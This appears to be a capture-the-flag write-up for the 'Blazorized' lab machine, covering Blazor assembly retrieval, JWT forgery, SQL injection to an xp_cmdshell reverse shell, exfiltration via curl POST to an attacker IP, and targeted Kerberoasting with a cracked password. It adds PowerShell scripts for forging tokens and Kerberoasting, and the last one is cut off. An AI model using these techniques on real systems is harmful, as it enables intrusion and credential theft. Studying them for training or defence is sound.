Blazorized
Initial Enumeration¶
Nmap Scan¶
We start off with an Nmap scan using the -p- and --min-rate 10000 flags to get a quick overview of all open TCP ports. Once we have the list we run a deeper scan against only the discovered ports to get service/version information and run the default scripts. A rate this high is fast but noisy and can drop ports on a lossy link, so rerun without it if the list looks thin.
$ sudo nmap -p- --min-rate 10000 10.129.231.74 -oN scans/all-ports-tcp.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 22:17 CET
Nmap scan report for 10.129.231.74
Host is up (0.031s latency).
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49684/tcp open unknown
49691/tcp open unknown
49698/tcp open unknown
49722/tcp open unknown
49776/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 10.14 seconds
$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001 -sC -sV 10.129.231.74 -oN scans/tcp-detailed.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 22:18 CET
Nmap scan report for 10.129.231.74
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-17 21:18:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.231.74\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
| ms-sql-ntlm-info:
| 10.129.231.74\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-17T21:18:43+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-17T21:15:45
|_Not valid after: 2055-01-17T21:15:45
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-17T21:18:38
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds
The scans tell us we are dealing with an Active Directory Domain Controller:
- Domain name: blazorized.htb
- Host name: DC1 (DC1.blazorized.htb)
- HTTP on 80/TCP, redirecting to http://blazorized.htb
- MSSQL Server 2022 on 1433/TCP
- WinRM on 5985/TCP
We add the domain and host names to our /etc/hosts file and move on to enumerating the website on 80/TCP.
Port 80/TCP¶
During manual enumeration we find that the website is a static site built with Blazor WebAssembly. We continue by fuzzing for virtual hosts with FFuF and discover the admin.blazorized.htb virtual host. The -fs 144 flag filters out the 144-byte response the server returns for Host headers it does not know, which is the baseline for this fuzzing run.
$ ffuf -u http://blazorized.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.blazorized.htb" -fs 144
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blazorized.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 144
________________________________________________
admin [Status: 200, Size: 2047, Words: 149, Lines: 28, Duration: 39ms]
:: Progress: [151265/151265] :: Job [1/1] :: 1129 req/sec :: Duration: [0:01:47] :: Errors: 0 ::
Adding it to our /etc/hosts file and navigating to it, we reach the Super Admin login form. We try some weak credentials, to no avail, and continue by researching and enumerating Blazor itself.
Researching & Enumerating Sensitive Files in Blazor¶
Reading the Microsoft Docs on Blazor, we come across the blazor.boot.json resource file, which is the manifest of the files that make up the web application. The documentation also tells us that the static web assets, including blazor.boot.json itself, are served from the _framework folder. We curl it and get the full list of .dll files used by the application, including the lazily loaded ones listed under lazyAssembly. Because a Blazor WebAssembly app runs entirely in the browser, every assembly in this manifest is downloadable by anyone who can reach the site, so anything compiled into them is effectively public.
$ curl -s 'http://blazorized.htb/_framework/blazor.boot.json'
{
"cacheBootResources": true,
"config": [ ],
"debugBuild": false,
"entryAssembly": "Blazorized.DigitalGarden",
"icuDataMode": 0,
"linkerEnabled": true,
"resources": {
"assembly": {
"Blazored.LocalStorage.dll": "sha256-5V8ovY1srbIIz7lzzMhLd3nNJ9LJ6bHoBOnLJahv8Go=",
"Blazorized.DigitalGarden.dll": "sha256-YH2BGBuuUllYRVTLRSM+TxZtmhmNitErmBqq1Xb1fdI=",
"Blazorized.Shared.dll": "sha256-Bz\/iaIKjbUZ4pzYB1LxrExKonhSlVdPH63LsehtJDqY=",
"Markdig.dll": "sha256-\/zBLNTAFSwzmj9Qq3hOzX4jN+IzlZOPHCL3qEU4t8BQ=",
"Microsoft.AspNetCore.Components.dll": "sha256-q\/vMB0OEwpfgaAe0kahnXQUPQ5ux0ryaY2BXkF22E8Y=",
"Microsoft.AspNetCore.Components.Forms.dll": "sha256-ilsozHMhNmrU5XRQkeYzpGDYHyLUQXPUW4Hh4D7ueZ4=",
"Microsoft.AspNetCore.Components.Web.dll": "sha256-KWEr4EaQSjbTnpfqEN\/6Nl330iwzKzUAkJlJ1BpK\/MU=",
"Microsoft.AspNetCore.Components.WebAssembly.dll": "sha256-Ej9bH2qZK\/yyvACie45LB5PgSAlH0sPfZjnHKyBY1MA=",
"Microsoft.Extensions.Configuration.Abstractions.dll": "sha256-X\/f4fDl2cuIRXeWHhK\/f2UqQbFioD+RU4a4CEh0zrrQ=",
"Microsoft.Extensions.Configuration.dll": "sha256-DBOKSPriP2JDxVbbWrLXyD3K4\/x3RBifNBWk\/q1I39M=",
"Microsoft.Extensions.Configuration.Json.dll": "sha256-Q5AqJneA2TZnzC0IYzBx6j\/tHRhWAeMbpH3BsV7KgWg=",
"Microsoft.Extensions.DependencyInjection.Abstractions.dll": "sha256-3dT6SSIGGrs8Me0BhM7OKQNnZgPiMpzxJxbKZg9+PPk=",
"Microsoft.Extensions.DependencyInjection.dll": "sha256-qi0kE7rp0kdsNqdL6DyPZEeimjUGvcLT4iWQX0YnRus=",
"Microsoft.Extensions.Http.dll": "sha256-rZWnWVD6nK+nRjxDQYWLF5GE9vGvT14HtIoM\/0PlVd0=",
"Microsoft.Extensions.Localization.Abstractions.dll": "sha256-HmuAsUnHX2mxnAL703FjrEbwGneVw5Q96ZGBg3m7xEw=",
"Microsoft.Extensions.Localization.dll": "sha256-oL+8vEgiohIU\/VOsIukfsaS53JGMyOPV5Grr6Zd6TSk=",
"Microsoft.Extensions.Logging.Abstractions.dll": "sha256-+5dUbJ9ffsgK5RahPCQeMw5x76+LlE6F9dqvF2FoBHg=",
"Microsoft.Extensions.Logging.dll": "sha256-Sezvu1SpB+vPfYWMQ+LQtRpFvN9Ym3AvPDnKYCKxL14=",
"Microsoft.Extensions.Options.dll": "sha256-k9XISCK5fk9IUDDKqLl\/+QFebprK5dgTjSKpE\/Zpz8Q=",
"Microsoft.Extensions.Primitives.dll": "sha256-eXvGx2jcjpTPEJoAHBsW\/VuMPbNyyU+AsuhPmkzSSRY=",
"Microsoft.IdentityModel.Abstractions.dll": "sha256-a1daKYknMuF16uFadrwL8fjYxiN83JCr285kxf6l1SI=",
"Microsoft.IdentityModel.JsonWebTokens.dll": "sha256-ZceT+VyXrVMCCQx7ghNz4BXbpCkOZwHTSkPikk1tYfg=",
"Microsoft.IdentityModel.Logging.dll": "sha256-yUKJ+ALshaP1bgyC3HBJYhvWi8ZO89OQq1D6xzUcsjA=",
"Microsoft.IdentityModel.Tokens.dll": "sha256-kci9vmm4cxzxjfLH7gBsdkuSD95idJws2K27ijmaMqg=",
"Microsoft.JSInterop.dll": "sha256-3OzHtLOp\/ABrxbs+cwoO9uxU3d1YqRrcP6MgKAWKCOQ=",
"Microsoft.JSInterop.WebAssembly.dll": "sha256-4cMfifCYL\/bv5qiC8T6HyABhOewZlTXovRc+E\/CrUbc=",
"MudBlazor.dll": "sha256-BCkPqJ+DM7hJKpuUnFQY98YKaIwoRWyqzw8JkUBKQf0=",
"MudBlazor.Markdown.dll": "sha256-6eL9fPi7IlrwF4XROmZgloTtnqKEqzak7Aew1tykYPI=",
"System.Collections.Concurrent.dll": "sha256-VJZ+9mtVjI3oFnHaOcs7QQWwE1tpcmsn\/Fbf1ss51EE=",
"System.Collections.dll": "sha256-PcqW0HOMhSsdhOuo97PP73z311WvAUQjMNlDxO0YNvg=",
"System.ComponentModel.Annotations.dll": "sha256-p3FeLGazqadK+YWA5aMJEwKQP4\/CX0gumrfPLmaMmss=",
"System.ComponentModel.dll": "sha256-Fk2YdbIh1S9I3Jn+elQpV9RdU2OqJiVenl74EbfuW34=",
"System.ComponentModel.Primitives.dll": "sha256-f2JppNaTVR3r2YAWy4aA5vx0Ouy5xoW17tkOh8su2Wc=",
"System.ComponentModel.TypeConverter.dll": "sha256-z8NaAg44tOD7RGtFlQNGs6GywkgWXfQxiH9IJyUJaBs=",
"System.Console.dll": "sha256-Z0qITFiDb6P2gyaZV9Ku42+3y\/8YwgfrxLnEDp5E15s=",
"System.dll": "sha256-GXYaTkUWqIcsGI6VKD2SIHDrRwOD2xQU1UA9nONh8PU=",
"System.Formats.Asn1.dll": "sha256-V5AtfHy4i4TRClZ4wQZ7hPz5VgLdBCZQYasU5aJR9D0=",
"System.IdentityModel.Tokens.Jwt.dll": "sha256-6UnGv5ruxREG0Pk32MuWFOFjcqcvYNuinJcJaBXPnRA=",
"System.IO.Compression.dll": "sha256-6oQKWB3LN6lvKLNpYiIalauJCy2YonpZ7QBLAmoMCao=",
"System.Linq.dll": "sha256-YuUMLuHQ4VWrIe8ecXrKp6f8BFkPKwTInHAFtRspY3A=",
"System.Linq.Expressions.dll": "sha256-krU0mE+qHN23mrVgI0s\/99oAYEHtztkgJ59u0Uy+x6c=",
"System.Memory.dll": "sha256-+MXdUexgKsH1w9XI5G8BWxuEY0tKIAD+xuE1kO1lYbA=",
"System.Net.Http.dll": "sha256-5YDY3emMx3szDVfae1lDDlTPXH3VB1apmM8hECmSQR4=",
"System.Net.Http.Json.dll": "sha256-CG\/PL04ZZqfHAYQdh\/5IJKbcNSUSDUXbz6ZYqyJ5cPM=",
"System.Net.Primitives.dll": "sha256-eNUKNz+XLN5pHDhz0TRrSWVzwD7sT8fHO\/iPmRMMcmw=",
"System.ObjectModel.dll": "sha256-rCCEEgfTj3ifxigXAW8vpXI2xDFjBeDcFTeEeQRCxGs=",
"System.Private.CoreLib.dll": "sha256-duCS2lpNXrvF\/sII\/ROPczy30vEs54dkJG+WagUjwU8=",
"System.Private.Uri.dll": "sha256-QUp9pgVKRli5\/xLQf5zWfHAD1KRUEi3RgO1D6HY2SHk=",
"System.Private.Xml.dll": "sha256-ApyqBjTVBbNCyZJP0aNRxd1cJdyLNpElRVs622uuJ54=",
"System.Runtime.CompilerServices.Unsafe.dll": "sha256-ioMG7tdGMQuJXQaFEifb58Wo9nhzQ138YPF3FjXFKso=",
"System.Runtime.dll": "sha256-2oCgFx36GBC0xZjd1hl5ZQXxw8zwZ00R\/SxrGu6Qy\/4=",
"System.Runtime.InteropServices.dll": "sha256-ZnOr3qdZamAmXJoClwtU11aePkDpbPGGRXGGVZq+qss=",
"System.Runtime.InteropServices.JavaScript.dll": "sha256-K56cee2Wp0fFNOLSZjwAZWsvsexfPJ8Fc\/rP97RFSG0=",
"System.Runtime.Intrinsics.dll": "sha256-RNcogVfdvH7r++k9\/Sbs9aGp2Tsky8bIOWUFHl+j4jo=",
"System.Runtime.Numerics.dll": "sha256-+oHtVeVcUysD56UQYTTLJ3BnD9766uThPNHg700sxu0=",
"System.Security.Claims.dll": "sha256-i6iOwZtEGi1jKX5BS7V4Kk8mECmyZ8l49ewkm9Ik64E=",
"System.Security.Cryptography.Algorithms.dll": "sha256-RLpI4SG0X+BmJMzdnl6YDepqNNnezyDys3pyTGWlEkI=",
"System.Security.Cryptography.Cng.dll": "sha256-\/p2zCahEBOv3gbqd9XHRwVrL\/fUq8tH43+kjm7i1J\/I=",
"System.Security.Cryptography.Csp.dll": "sha256-5kZPZt\/Q7PijslxzV+248xs\/IheEIclYiOI+4XMCbLM=",
"System.Security.Cryptography.dll": "sha256-A0EGy+fyvbI6PCM1gzdpr\/jNhfYS5deVqnMdth3sLWA=",
"System.Security.Cryptography.Encoding.dll": "sha256-TLpkd3NtthEaWBqHHShAVwYUIf26TiT4fO86Hig94Js=",
"System.Security.Cryptography.Primitives.dll": "sha256-JILevD8ua6+qLJj8fU9Xymuzm2vr701AQnCKSlCKLjE=",
"System.Security.Cryptography.X509Certificates.dll": "sha256-Tt6t3gSGKhS6w1kcDylF6h1UA+FrRey75wv1Dr88Ctc=",
"System.Text.Encodings.Web.dll": "sha256-lwzvCAdo+KGRqRiuotyXVHSbpe7fuNSGMM0OMK0VbPk=",
"System.Text.Json.dll": "sha256-ZgCOtGviIgH5dm9k+o2H8tL+gga3BjBCdmpl16zI2Xs=",
"System.Text.RegularExpressions.dll": "sha256-A0Xkv8sUH8DOBuAI5Jwc9XCl\/F4IeSM57\/tzPba6HEU=",
"System.Threading.dll": "sha256-J1ieNAafmr6H5LOMxJMuRKh3LGKtmT2upEU\/c5tnt68=",
"System.Threading.Thread.dll": "sha256-pLV9qpTnD4J45AaN\/Z3QTnTPFGQwMI4mFEJaij83X3Q=",
"System.Xml.ReaderWriter.dll": "sha256-9yumv+5QaTSARQB46DStO9vcXQyA3cPvv74jAta3lQA="
},
"extensions": null,
"lazyAssembly": {
"Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
},
"libraryInitializers": null,
"pdb": null,
"runtime": {
"dotnet.7.0.15.x46e81vra7.js": "sha256-MHuxwxeVFybuBBTAWeZrvoStZpW+H4ThSaRcFvrfqXM=",
"dotnet.timezones.blat": "sha256-aHk3Pm2JXopn6UPLJtovAqIdIk8GyIMzGm450cli9UE=",
"dotnet.wasm": "sha256-fMuaMGy\/7q8rXL+GyH9Gu04mJDwQ\/OSYXD9ezf+Fz4k=",
"icudt_CJK.dat": "sha256-SZLtQnRc0JkwqHab0VUVP7T3uBPSeYzxzDnpxPpUnHk=",
"icudt_EFIGS.dat": "sha256-8fItetYY8kQ0ww6oxwTLiT3oXlBwHKumbeP2pRF4yTc=",
"icudt_no_CJK.dat": "sha256-L7sV7NEYP37\/Qr2FPCePo5cJqRgTXRwGHuwF5Q+0Nfs=",
"icudt.dat": "sha256-tO5O5YzMTVSaKBboxAqezOQL9ewmupzV2JrB5Rkc8a4="
},
"runtimeAssets": {
"dotnet.wasm": {
"behavior": "dotnetwasm",
"hash": "sha256-fMuaMGy\/7q8rXL+GyH9Gu04mJDwQ\/OSYXD9ezf+Fz4k="
}
},
"satelliteResources": null
}
}
We download the listed assemblies, most importantly Blazorized.Helpers.dll, from the _framework directory using curl. The custom application assemblies (Blazorized.*) are the interesting ones; the Microsoft.* and System.* entries are stock framework code.
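The manual curl above is enough for one file. The following script is an added example (not part of the original write-up) that pulls every assembly the manifest names, including the lazily loaded ones that never show up in the browser's network tab during normal browsing, and checks each download against the SRI hash in blazor.boot.json. The base URL is the page's; the output directory name is an assumption.

```powershell
# Added example: download and integrity-check every assembly listed in
# blazor.boot.json. Run from the attack host (Windows PowerShell 5.1 or pwsh).
param(
    [string]$BaseUrl = 'http://blazorized.htb/_framework',
    [string]$OutDir  = './blazor-assemblies'          # assumed output location
)

$ErrorActionPreference = 'Stop'
$ProgressPreference    = 'SilentlyContinue'            # speeds up Invoke-WebRequest on PS 5.1
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# .NET serialises "/" as "\/" in the manifest; ConvertFrom-Json (used by
# Invoke-RestMethod) unescapes it for us.
$boot   = Invoke-RestMethod -Uri "$BaseUrl/blazor.boot.json"
$sha256 = [System.Security.Cryptography.SHA256]::Create()
$results = @()

# Eager assemblies first, then lazy ones, then symbol files if any were shipped.
foreach ($section in 'assembly', 'lazyAssembly', 'pdb') {
    $entries = $boot.resources.$section
    if ($null -eq $entries) { continue }
    foreach ($prop in $entries.PSObject.Properties) {
        $name     = $prop.Name                      # e.g. Blazorized.Helpers.dll
        $expected = $prop.Value                     # e.g. sha256-ekLz...AQQ=
        $dest     = Join-Path $OutDir $name
        Invoke-WebRequest -Uri "$BaseUrl/$name" -OutFile $dest

        # The manifest hash is base64(SHA-256(bytes)) with a "sha256-" prefix.
        $bytes  = [System.IO.File]::ReadAllBytes((Resolve-Path $dest).ProviderPath)
        $actual = 'sha256-' + [Convert]::ToBase64String($sha256.ComputeHash($bytes))

        $results += [pscustomobject]@{
            Section = $section
            Name    = $name
            Bytes   = $bytes.Length
            HashOk  = ($actual -eq $expected)
        }
    }
}

$results | Sort-Object Section, Name | Format-Table -AutoSize
```

A HashOk of False means the file was altered in transit or the server handed back something other than the raw assembly (some hosts only serve the pre-compressed .dll.br or .dll.gz variants); in that case fetch the compressed name and decompress before decompiling. Filtering the table on Section equal to lazyAssembly is the quickest way to spot helper libraries like Blazorized.Helpers.dll that are easy to miss when browsing the site by hand.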
Exploitation¶
Decompiling DLLs¶
We spin up a Windows host and use dnSpy to decompile the DLL files (the cross-platform ILSpy command line tool, ilspycmd, works just as well on Linux). In the decompiled Blazorized.Helpers.dll we find very interesting information in the JWT class: the JWT signing key is hard-coded as a string, and the issuer, audience and claim values are stored as members of the class.
The VerifyJWT function reveals which signing algorithm the backend accepts.
The GenerateSuperAdminJWT function tells us exactly which claim values a Super Admin token needs.
Generate JWT¶
We now have everything needed to forge a Super Admin JWT: the values of the iss and aud registered claims, the role and emailaddress claim values, the signing key and the signing algorithm. Because the key is symmetric, anyone holding it can mint tokens, not just verify them. The last thing needed is an expiration date (exp) converted to Unix epoch seconds. One caveat: if GenerateSuperAdminJWT builds its claims with ClaimTypes.Role and ClaimTypes.Email, the claim names that end up in the token are the full schema URIs, so copy the names exactly as they appear in the decompiled code rather than using the short forms.
To generate the token we use the jwt.io debugger: we enter the header and payload, the epoch-converted expiration date, and the secret key under VERIFY SIGNATURE. Next we copy the encoded token and add it to our browser's local storage for the http://admin.blazorized.htb origin.
Upon refreshing the page we are authenticated to the Super Admin Panel.
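The same token can be produced without jwt.io. The function below is an added example (not code from the write-up or from the target application) that signs a JWT with HMAC the way a .NET JwtSecurityTokenHandler with a SymmetricSecurityKey does. Every value in the claims table, the key and the algorithm are placeholders to replace with what the decompiled JWT class actually contains; the two schema URIs are the names .NET emits for ClaimTypes.Email and ClaimTypes.Role.

```powershell
# Added example: forge an HMAC-signed JWT from the values recovered by decompiling.
function ConvertTo-Base64Url {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    # JWT segments use the URL-safe alphabet with padding stripped.
    [Convert]::ToBase64String($Bytes).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function New-HmacJwt {
    param(
        [Parameter(Mandatory)][System.Collections.IDictionary]$Claims,
        [Parameter(Mandatory)][string]$SigningKey,
        [ValidateSet('HS256', 'HS384', 'HS512')][string]$Algorithm = 'HS256'
    )
    $utf8   = [System.Text.Encoding]::UTF8
    $header = [ordered]@{ alg = $Algorithm; typ = 'JWT' }

    # token = b64url(header) . b64url(payload) . b64url(HMAC(key, header.payload))
    $h = ConvertTo-Base64Url $utf8.GetBytes(($header | ConvertTo-Json -Compress))
    $p = ConvertTo-Base64Url $utf8.GetBytes(($Claims | ConvertTo-Json -Compress))

    $hmac = switch ($Algorithm) {
        'HS256' { [System.Security.Cryptography.HMACSHA256]::new($utf8.GetBytes($SigningKey)) }
        'HS384' { [System.Security.Cryptography.HMACSHA384]::new($utf8.GetBytes($SigningKey)) }
        'HS512' { [System.Security.Cryptography.HMACSHA512]::new($utf8.GetBytes($SigningKey)) }
    }
    $sig = ConvertTo-Base64Url $hmac.ComputeHash($utf8.GetBytes("$($h).$($p)"))
    "$($h).$($p).$($sig)"
}

# Placeholders: take the real values from GenerateSuperAdminJWT and VerifyJWT.
$now    = [DateTimeOffset]::UtcNow.ToUnixTimeSeconds()
$claims = [ordered]@{
    'http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress' = '<email-from-dll>'
    'http://schemas.microsoft.com/ws/2008/06/identity/claims/role'       = '<role-from-dll>'
    iss = '<issuer-from-dll>'
    aud = '<audience-from-dll>'
    nbf = $now
    iat = $now
    exp = $now + 3600        # epoch seconds; must lie in the future or validation fails
}

$token = New-HmacJwt -Claims $claims -SigningKey '<key-from-dll>' -Algorithm 'HS256'
$token
```

Paste the printed token into the browser's local storage for admin.blazorized.htb under the key the decompiled code reads (the app uses Blazored.LocalStorage, so localStorage.setItem in the console is enough), then reload. If the panel still rejects the token, the first things to compare against the decompiled VerifyJWT are the algorithm name in the header and the exact claim names, since both are checked before the signature matters.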
SQL Injection¶
We enumerate the newly unlocked functionality and eventually find an SQL injection vulnerability in the Check Duplicate Category Names feature.
If we enter an existing category name, we get the expected response (the name is reported as a duplicate):
Using the payload sqli' OR 1=1-- - instead, we confirm the injection: the always-true condition makes the query return every category name.
Since the Nmap scan showed this is an MSSQL database, we try to execute operating-system commands through xp_cmdshell. This only works if the application's database login is sysadmin (or has been granted the procedure explicitly), if the injection point allows stacked statements, and if xp_cmdshell is enabled, which it is not by default (it is switched on with sp_configure). Here it turns out to be already enabled, so we continue by preparing a payload to obtain a reverse shell.
We generate a base64-encoded PowerShell command with revshells and start our listener on the attack host. PowerShell's -e flag expects the base64 of the UTF-16LE encoding of the command, which revshells produces; the encoded form also contains no single quotes, so nothing needs escaping inside the T-SQL string literal. Next we issue the payload sqli'; EXEC xp_cmdshell 'powershell.exe -e <BASE64>'-- -.
We get a reverse shell on the DC1 host as domain user nu_1055.
$ rlwrap -cAr nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.33] from (UNKNOWN) [10.129.231.74] 60584
PS C:\Windows\system32> whoami
blazorized\nu_1055
PS C:\Windows\system32> hostname
DC1
The user flag can now be found at C:\Users\NU_1055\Desktop\user.txt
AD Exploitation¶
We start a web server on our attack host to serve SharpHound, download it on the victim host with curl, and run it with all collection methods to gather information about the Active Directory domain, saving the result as a ZIP file.
PS C:\Programdata\xpltive> .\SharpHound.exe -c All --zipfilename blazorized
2025-01-17T17:35:48.0030205-06:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2025-01-17T17:35:48.1749202-06:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-01-17T17:35:48.2061451-06:00|INFORMATION|Initializing SharpHound at 5:35 PM on 1/17/2025
2025-01-17T17:35:48.3155085-06:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for blazorized.htb : DC1.blazorized.htb
2025-01-17T17:35:48.4405138-06:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-01-17T17:35:48.5967695-06:00|INFORMATION|Beginning LDAP search for blazorized.htb
2025-01-17T17:35:48.6436574-06:00|INFORMATION|Producer has finished, closing LDAP channel
2025-01-17T17:35:48.6436574-06:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-01-17T17:36:18.7530508-06:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2025-01-17T17:36:34.6748818-06:00|INFORMATION|Consumers finished, closing output channel
2025-01-17T17:36:34.7061341-06:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-01-17T17:36:34.8936755-06:00|INFORMATION|Status: 110 objects finished (+110 2.391304)/s -- Using 43 MB RAM
2025-01-17T17:36:34.8936755-06:00|INFORMATION|Enumeration finished in 00:00:46.3006387
2025-01-17T17:36:34.9717551-06:00|INFORMATION|Saving cache with stats: 70 ID to type mappings.
70 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-01-17T17:36:34.9873843-06:00|INFORMATION|SharpHound Enumeration Completed at 5:36 PM on 1/17/2025! Happy Graphing!
We then start an upload server on our attack host and transfer the ZIP file containing the domain data back to us with curl.
PS C:\Programdata\xpltive> cmd /c curl -X POST -F "files=@20250117173634_blazorized.zip" http://10.10.16.33:1081/upload
Importing the ZIP archive into BloodHound, we see that nu_1055 has WriteSPN rights on the user rsa_4810.
Targeted Kerberoasting & Lateral Movement to rsa_4810¶
WriteSPN lets us write the servicePrincipalName attribute of rsa_4810, which makes a targeted Kerberoasting attack possible: we set a bogus SPN on the account, request a Kerberos service ticket for it (encrypted with a key derived from the account's password) and crack that ticket offline. We transfer PowerView to the victim host, use Set-DomainObject to set the SPN and Get-DomainSPNTicket to request the ticket in Hashcat format. Two things to keep in mind: the SPN has to be unique in the forest or the write is rejected, and it should be removed again (Set-DomainObject -Clear serviceprincipalname) once the ticket has been captured.
PS C:\Programdata\xpltive> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='doesnt/MATTER'}
PS C:\Programdata\xpltive> Get-DomainUser -Identity rsa_4810 -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
$krb5tgs$23$*RSA_4810$blazorized.htb$doesnt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
We copy the ticket hash and crack it with Hashcat (mode 13100 for etype 23 RC4 tickets, which --identify also reports).
$ ./hashcat --identify hashes/blazorized/rsa_4810.tgs
<--SNIP-->
$krb5tgs$23$*RSA_4810$blazorized.htb$doesnt/MATTER*$b443879bfd6b5ae278b97bcc90779be9$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:(Ni7856Do9854Ki05Ng0005 #)
<--SNIP-->
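The two PowerView commands above do the job, but leave the bogus SPN on the account. The script below is an added example (not from the write-up) that wraps the same attack with the checks and cleanup a practitioner wants: it records the account's existing SPNs, refuses to proceed if the account is disabled or the SPN already exists, requests the ticket, and restores the attribute afterwards whether or not the request succeeded. It assumes PowerView.ps1 in the current directory and a session that holds WriteSPN on the target; the SPN string and output file name are arbitrary.

```powershell
# Added example: targeted Kerberoast with state recording and cleanup.
param(
    [string]$Target   = 'RSA_4810',
    [string]$BogusSpn = 'doesnt/MATTER',
    [string]$OutFile  = "$Target.tgs"
)
Import-Module .\PowerView.ps1

# 1. Record the current state so it can be put back exactly.
$user = Get-DomainUser -Identity $Target -Properties samaccountname, serviceprincipalname, useraccountcontrol
if (-not $user) { throw "user $Target not found" }
$originalSpns = @($user.serviceprincipalname | Where-Object { $_ })
if ($originalSpns.Count -gt 0) {
    Write-Host "[*] $Target already has SPNs ($($originalSpns -join ', ')); a plain Kerberoast works without any write"
}
if ("$($user.useraccountcontrol)" -match 'ACCOUNTDISABLE') {
    throw "$Target is disabled; the KDC will not issue a ticket for it"
}

# 2. An SPN must be unique in the forest; a duplicate makes the write fail.
if (Get-DomainUser -SPN | Where-Object { $_.serviceprincipalname -contains $BogusSpn }) {
    throw "SPN $BogusSpn is already in use"
}

# 3. Set the SPN, request the TGS, save it in Hashcat format.
Set-DomainObject -Identity $Target -Set @{ serviceprincipalname = $BogusSpn } -Verbose
try {
    $hash = Get-DomainSPNTicket -SPN $BogusSpn -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
    if (-not $hash) { throw 'no ticket returned' }
    $hash | Set-Content -Path $OutFile -Encoding ASCII
    Write-Host "[+] ticket written to $OutFile"
}
finally {
    # 4. Cleanup runs even if the request failed: restore or clear the attribute.
    if ($originalSpns.Count -gt 0) {
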